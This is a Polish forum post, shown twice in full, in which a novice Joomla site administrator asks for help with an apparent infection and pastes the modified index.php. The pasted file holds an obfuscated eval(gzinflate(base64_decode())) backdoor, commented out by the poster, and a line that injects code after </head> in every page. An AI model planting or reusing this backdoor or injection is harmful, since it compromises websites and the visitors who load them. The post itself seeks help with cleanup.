anco
11-12-2012, 09:54
Może opiszę problem w skrócie - nie jestem alfą i omegą z joomlą a więc zwracam się do was o pomoc - od jakiegoś czasu pojawia mi się błąd a może bardziej wirus w kodzie strony nie wiem jak to się stało ale coś jest nie tak. Zaczęło się od "wysypania skryptu jednego z modułów strony" - plik w załączniku - jakoś poszperałem w skrypcie i udało mi się usunąć ten kod z poziomu administracji z katalogu templates/mojatemplatka/index.php tak że widziany w załączniku wysypany skrypt zniknął. Po ty zaczełem dostawać sygnały, że program Avast pokazuje, że na głównej stronie jest wirus a więc postanowiłem nadpisać poprawnym plikiem index.php. po tej operacji wróciliśmy do punktu pierwszego czyli wysypanego skryptu na głównej stronie portalu (załącznik), który o dziwo raz się pojawia raz znika .
Mój hosting pisze cytuję
Witam,
To nie wina serwera proszę kontaktować się z webmasterem.
Pozdrawiam,
Dla pomocy wklejam "dziwny" kod z plików index.php i index2.php
index.php
<?php
/**
* @version $Id: index.php 10381 2008-06-01 03:35:53Z pasamio $
* @package Joomla
* @copyright Copyright (C) 2005 - 2008 Open Source Matters. All rights reserved.
* @license GNU/GPL, see LICENSE.php
* Joomla! is free software. This version may have been modified pursuant
* to the GNU General Public License, and as distributed it includes or
* is derivative of works licensed under the GNU General Public License or
* other free or open source software licenses.
* See COPYRIGHT.php for copyright notices and details.
*/
/////////////////////////////////////// fragment do usunięcia ///////////////////////////////////////
//preg_replace("/.+/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x 74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63 \x6F\x64\x65\x28'nVVtb9owEP5Mf4Ur0TqZIJRp2qSiiKGSt kgtMBP2IoqikLgkWkgix/RlFf99ZzuEAqGdBh9IfM/d89z57phTttD01tH9MvZ4mMRoLg/Qy1Gl6k5wmOIpkh8TLDxMBVZalizKTdIyZpEyee7MZX4YwzFuP z6aWBz6ppZxliaZVrjWEI6SJMX6sWneu1FG9TZnS3oun8EnvNe qvv5CvSDRcKHOc6OI+hNsFHEMCCXe17zwjvXWSgRA+6QFTDdzW nR6ivZgOJknJi4wshzbisL4wY1CHwm8pKswypcsBuWrXfGUe8E GKFiCJOOqeib6WnVGFvlukQlWv06/c2vhaV5nd05jhd2CXtv20BnDm9O5svp2AWf0njLKwGEfTqxLi1 hEYeksSpQAHHCenjcasyTKAsqZO4uMmPIGm/uNcLGMEyMN0rbvctfExszN6OdPDo29xKdaRlkIZfhDoXa6uv5A EHuQrRPGIdckj67u8xisJaXMEu835cgPM2Cmfkk5VbyM8iSFiF 5QQxdjcjMY2pCSPSZ9m3T6I8it1hRMh9F279YajO0aap7pLSTU FmLpE/UEWN+03oPLHH+5SOFYb0mpCslYwiS0aDNIrCQvukj5M2I0W0Zw 22VNsmlQD8ahXlfWev3VUKCX3CV3SBmdOwsXOkrDJ3eT9G6qGR/a+t2kAY8nIYYOr1XBRVeCKHSpJt4nzalIrUKfQq7opUiR2lF+u Dp6vQXkrIsYgjWMHZcx91nbdBSxbge25XS6XSKGWZlx8+MX4wy +TSznG8ZVtrqur+sDsTK4Gm2nNX86lwPyo0O6Vlc84WnukBcMv QcXqa1kWnsOW0L3spR7q0izRNoItIgdsXeKTBidJMZKaDXzArq g63HKxNpbISoWTIkZqyuoiuLAWWlJrgcjW3C3d5NXBnSODi+Os mSI9W1sjWxnTHp5ecX4V6rQ0yAhF2hgWASwTYUw44BvSzqq5Mq Juj1iXdjO6IL0hq8JKwXb2+DWgVYpwKCG/HJGNun1rza9IoMb4n8HG+86rTvmjTR261X5r2K9SZFLg/204UhdHpTXSMJa7+gQ7jvN9y+qh9dDeL65FP+oW/XbK9urIYPAYqL+Ag=='\x29\x29\x29\x3B",".");
/////////////////////////////////// koniec fragmentu do usuniecia ///////////////////////////////////////////////////
// Set flag that this is a parent file
define( '_JEXEC', 1 );
define('JPATH_BASE', dirname(__FILE__) );
define( 'DS', DIRECTORY_SEPARATOR );
require_once ( JPATH_BASE .DS.'includes'.DS.'defines.php' );
require_once ( JPATH_BASE .DS.'includes'.DS.'framework.php' );
JDEBUG ? $_PROFILER->mark( 'afterLoad' ) : null;
/**
* CREATE THE APPLICATION
*
* NOTE :
*/
$mainframe =& JFactory::getApplication('site');
/**
* INITIALISE THE APPLICATION
*
* NOTE :
*/
// set the language
$mainframe->initialise();
JPluginHelper::importPlugin('system');
// trigger the onAfterInitialise events
JDEBUG ? $_PROFILER->mark('afterInitialise') : null;
$mainframe->triggerEvent('onAfterInitialise');
/**
* ROUTE THE APPLICATION
*
* NOTE :
*/
$mainframe->route();
// authorization
$Itemid = JRequest::getInt( 'Itemid');
$mainframe->authorize($Itemid);
// trigger the onAfterRoute events
JDEBUG ? $_PROFILER->mark('afterRoute') : null;
$mainframe->triggerEvent('onAfterRoute');
/**
* DISPATCH THE APPLICATION
*
* NOTE :
*/
$option = JRequest::getCmd('option');
$mainframe->dispatch($option);
// trigger the onAfterDispatch events
JDEBUG ? $_PROFILER->mark('afterDispatch') : null;
$mainframe->triggerEvent('onAfterDispatch');
/**
* RENDER THE APPLICATION
*
* NOTE :
*/
$mainframe->render();
// trigger the onAfterRender events
JDEBUG ? $_PROFILER->mark('afterRender') : null;
$mainframe->triggerEvent('onAfterRender');
/**
* RETURN THE RESPONSE
*/
$JResp = JResponse::toString($mainframe->getCfg('gzip'));
/*rrt*/
$JResp = str_ireplace("</head>", "</head>".$code, $JResp);
echo $JResp;
index2.php
<?php
/**
* @version $Id: index2.php 10381 2008-06-01 03:35:53Z pasamio $
* @package Joomla
* @copyright Copyright (C) 2005 - 2008 Open Source Matters. All rights reserved.
* @license GNU/GPL, see LICENSE.php
* Joomla! is free software. This version may have been modified pursuant
* to the GNU General Public License, and as distributed it includes or
* is derivative of works licensed under the GNU General Public License or
* other free or open source software licenses.
* See COPYRIGHT.php for copyright notices and details.
*/
$_REQUEST['tmpl'] = 'component';
include('index.php');
Acha wykrywa tego "trojana" pod AVG i Kapserskym. Proszęr o pomoc gdyz jestem "raczkującym" administratorem w sprawach joomli
Pozdrawiam
Mój hosting pisze cytuję
Witam,
To nie wina serwera proszę kontaktować się z webmasterem.
Pozdrawiam,
Dla pomocy wklejam "dziwny" kod z plików index.php i index2.php
index.php
<?php
/**
* @version $Id: index.php 10381 2008-06-01 03:35:53Z pasamio $
* @package Joomla
* @copyright Copyright (C) 2005 - 2008 Open Source Matters. All rights reserved.
* @license GNU/GPL, see LICENSE.php
* Joomla! is free software. This version may have been modified pursuant
* to the GNU General Public License, and as distributed it includes or
* is derivative of works licensed under the GNU General Public License or
* other free or open source software licenses.
* See COPYRIGHT.php for copyright notices and details.
*/
/////////////////////////////////////// fragment do usunięcia ///////////////////////////////////////
//preg_replace("/.+/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x 74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63 \x6F\x64\x65\x28'nVVtb9owEP5Mf4Ur0TqZIJRp2qSiiKGSt kgtMBP2IoqikLgkWkgix/RlFf99ZzuEAqGdBh9IfM/d89z57phTttD01tH9MvZ4mMRoLg/Qy1Gl6k5wmOIpkh8TLDxMBVZalizKTdIyZpEyee7MZX4YwzFuP z6aWBz6ppZxliaZVrjWEI6SJMX6sWneu1FG9TZnS3oun8EnvNe qvv5CvSDRcKHOc6OI+hNsFHEMCCXe17zwjvXWSgRA+6QFTDdzW nR6ivZgOJknJi4wshzbisL4wY1CHwm8pKswypcsBuWrXfGUe8E GKFiCJOOqeib6WnVGFvlukQlWv06/c2vhaV5nd05jhd2CXtv20BnDm9O5svp2AWf0njLKwGEfTqxLi1 hEYeksSpQAHHCenjcasyTKAsqZO4uMmPIGm/uNcLGMEyMN0rbvctfExszN6OdPDo29xKdaRlkIZfhDoXa6uv5A EHuQrRPGIdckj67u8xisJaXMEu835cgPM2Cmfkk5VbyM8iSFiF 5QQxdjcjMY2pCSPSZ9m3T6I8it1hRMh9F279YajO0aap7pLSTU FmLpE/UEWN+03oPLHH+5SOFYb0mpCslYwiS0aDNIrCQvukj5M2I0W0Zw 22VNsmlQD8ahXlfWev3VUKCX3CV3SBmdOwsXOkrDJ3eT9G6qGR/a+t2kAY8nIYYOr1XBRVeCKHSpJt4nzalIrUKfQq7opUiR2lF+u Dp6vQXkrIsYgjWMHZcx91nbdBSxbge25XS6XSKGWZlx8+MX4wy +TSznG8ZVtrqur+sDsTK4Gm2nNX86lwPyo0O6Vlc84WnukBcMv QcXqa1kWnsOW0L3spR7q0izRNoItIgdsXeKTBidJMZKaDXzArq g63HKxNpbISoWTIkZqyuoiuLAWWlJrgcjW3C3d5NXBnSODi+Os mSI9W1sjWxnTHp5ecX4V6rQ0yAhF2hgWASwTYUw44BvSzqq5Mq Juj1iXdjO6IL0hq8JKwXb2+DWgVYpwKCG/HJGNun1rza9IoMb4n8HG+86rTvmjTR261X5r2K9SZFLg/204UhdHpTXSMJa7+gQ7jvN9y+qh9dDeL65FP+oW/XbK9urIYPAYqL+Ag=='\x29\x29\x29\x3B",".");
/////////////////////////////////// koniec fragmentu do usuniecia ///////////////////////////////////////////////////
// Set flag that this is a parent file
define( '_JEXEC', 1 );
define('JPATH_BASE', dirname(__FILE__) );
define( 'DS', DIRECTORY_SEPARATOR );
require_once ( JPATH_BASE .DS.'includes'.DS.'defines.php' );
require_once ( JPATH_BASE .DS.'includes'.DS.'framework.php' );
JDEBUG ? $_PROFILER->mark( 'afterLoad' ) : null;
/**
* CREATE THE APPLICATION
*
* NOTE :
*/
$mainframe =& JFactory::getApplication('site');
/**
* INITIALISE THE APPLICATION
*
* NOTE :
*/
// set the language
$mainframe->initialise();
JPluginHelper::importPlugin('system');
// trigger the onAfterInitialise events
JDEBUG ? $_PROFILER->mark('afterInitialise') : null;
$mainframe->triggerEvent('onAfterInitialise');
/**
* ROUTE THE APPLICATION
*
* NOTE :
*/
$mainframe->route();
// authorization
$Itemid = JRequest::getInt( 'Itemid');
$mainframe->authorize($Itemid);
// trigger the onAfterRoute events
JDEBUG ? $_PROFILER->mark('afterRoute') : null;
$mainframe->triggerEvent('onAfterRoute');
/**
* DISPATCH THE APPLICATION
*
* NOTE :
*/
$option = JRequest::getCmd('option');
$mainframe->dispatch($option);
// trigger the onAfterDispatch events
JDEBUG ? $_PROFILER->mark('afterDispatch') : null;
$mainframe->triggerEvent('onAfterDispatch');
/**
* RENDER THE APPLICATION
*
* NOTE :
*/
$mainframe->render();
// trigger the onAfterRender events
JDEBUG ? $_PROFILER->mark('afterRender') : null;
$mainframe->triggerEvent('onAfterRender');
/**
* RETURN THE RESPONSE
*/
$JResp = JResponse::toString($mainframe->getCfg('gzip'));
/*rrt*/
$JResp = str_ireplace("</head>", "</head>".$code, $JResp);
echo $JResp;
index2.php
<?php
/**
* @version $Id: index2.php 10381 2008-06-01 03:35:53Z pasamio $
* @package Joomla
* @copyright Copyright (C) 2005 - 2008 Open Source Matters. All rights reserved.
* @license GNU/GPL, see LICENSE.php
* Joomla! is free software. This version may have been modified pursuant
* to the GNU General Public License, and as distributed it includes or
* is derivative of works licensed under the GNU General Public License or
* other free or open source software licenses.
* See COPYRIGHT.php for copyright notices and details.
*/
$_REQUEST['tmpl'] = 'component';
include('index.php');
Acha wykrywa tego "trojana" pod AVG i Kapserskym. Proszęr o pomoc gdyz jestem "raczkującym" administratorem w sprawach joomli
Pozdrawiam